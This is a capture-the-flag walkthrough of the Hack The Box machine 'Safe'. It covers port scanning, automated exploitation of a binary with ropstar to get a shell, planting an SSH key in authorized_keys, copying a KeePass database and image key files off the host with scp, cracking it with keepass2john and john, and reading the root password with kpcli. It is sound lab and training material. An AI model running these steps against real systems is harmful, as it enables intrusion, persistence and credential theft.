Safe was an easy 20 point box created by ecdo. It started out with pwning a binary to get a shell as user and then abusing KeePass to get root.
User.txt
Nmap
We start the box with a quick TCP nmap scan:
1
2
3
4
5
6
7
8
9
10
11
# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.147 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) &&
nmap -sV -sC -T4 -p$ports 10.10.10.147
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
| 256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
|_ 256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
1337/tcp open waste?
HTTP
Checking out http://10.10.10.147/ we get the Apache 2 Debian Default Page. Checking the source code we see the following:
1
2
<!-- 'myapp' can be downloaded to analyze from here
its running on port 1337 -->
Going to http://10.10.10.147/myapp will download the binary for us.
Binary Exploitation
We can use a tool called ropstar to automatically pwn this binary for us:
1
2
3
4
5
# python ropstar.py /root/HTB/boxes/safe/myapp -rhost 10.10.10.147 -rport 1337
...
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
Flag
We can simply cat the user flag from our pwn shell:
1
2
$ cat /home/user/user.txt
7a29ee...
Root.txt
SSH Shell
To get a better shell we add the public key of our attacking host to /home/user/.ssh/authorized_keys and SSH in:
1
2
3
4
$ echo 'ssh-rsa AAAA...kzh root@kali' > /home/user/.ssh/authorized_keys
# ssh -i id_rsa user@10.10.10.147
user@safe:~$
KeePass
Checking out the users home directory we notice a KeePass Password Database file and a bunch of images:
1
2
3
4
5
6
7
8
user@safe:~$ ls -la
-rw-r--r-- 1 user user 1907614 May 13 11:15 IMG_0545.JPG
-rw-r--r-- 1 user user 1916770 May 13 11:15 IMG_0546.JPG
-rw-r--r-- 1 user user 2529361 May 13 11:15 IMG_0547.JPG
-rw-r--r-- 1 user user 2926644 May 13 11:15 IMG_0548.JPG
-rw-r--r-- 1 user user 1125421 May 13 11:15 IMG_0552.JPG
-rw-r--r-- 1 user user 1085878 May 13 11:15 IMG_0553.JPG
-rw-r--r-- 1 user user 2446 May 13 11:15 MyPasswords.kdbx
KeePass is an open source password manager where you can store passwords in encrypted databases which can only be unlocked with the master password/key file.
Since there are six random images present we can assume that one of these is the key file. Lets scp the kdbx file and the images over to our attacking hosts working directory:
1
2
3
4
5
6
7
# scp user@10.10.10.147:/home/user/MyPasswords.kdbx .
# scp user@10.10.10.147:/home/user/IMG_0545.JPG .
# scp user@10.10.10.147:/home/user/IMG_0546.JPG .
# scp user@10.10.10.147:/home/user/IMG_0547.JPG .
# scp user@10.10.10.147:/home/user/IMG_0548.JPG .
# scp user@10.10.10.147:/home/user/IMG_0552.JPG .
# scp user@10.10.10.147:/home/user/IMG_0553.JPG .
Cracking KeePass
To crack the KeePass Database File we’ll use a utility called keepass2john from JohnTheRipper that will extract the hash from the KeePass database file with the keyfile we specifiy:
1
2
# keepass2john
Usage: keepass2john [-k <keyfile>] <.kdbx database(s)>
By process of elimination we find out IMG_0547.JPG is the key file and the password is bullshit:
1
2
3
4
5
# keepass2john -k IMG_0547.JPG MyPasswords.kdbx > 547_hash
# john --wordlist=/root/rockyou.txt 547_hash
...
bullshit (mypass)
kpcli
Using kpcli, a command line interface for KeePass, we can open the MyPasswords.kdbx file and get the root password:
1
2
3
4
5
6
7
8
9
10
11
12
13
# kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx
Please provide the master password: bullshit
kpcli:/MyPasswords> help
...
show -- Show an entry: show [-f] [-a] <entry path|entry number>
...
kpcli:/MyPasswords> show 0
Title: Root password
Uname: root
Pass: u3v2249dl9ptv465cogl3cnpo3fyhk
URL:
Notes:
Flag
Within our SSH shell as user we just have to run the following and we get root:
1
2
3
4
5
user@safe:~$ su root
Password: u3v2249dl9ptv465cogl3cnpo3fyhk
root@safe:/home/user# cat /root/root.txt
d7af23...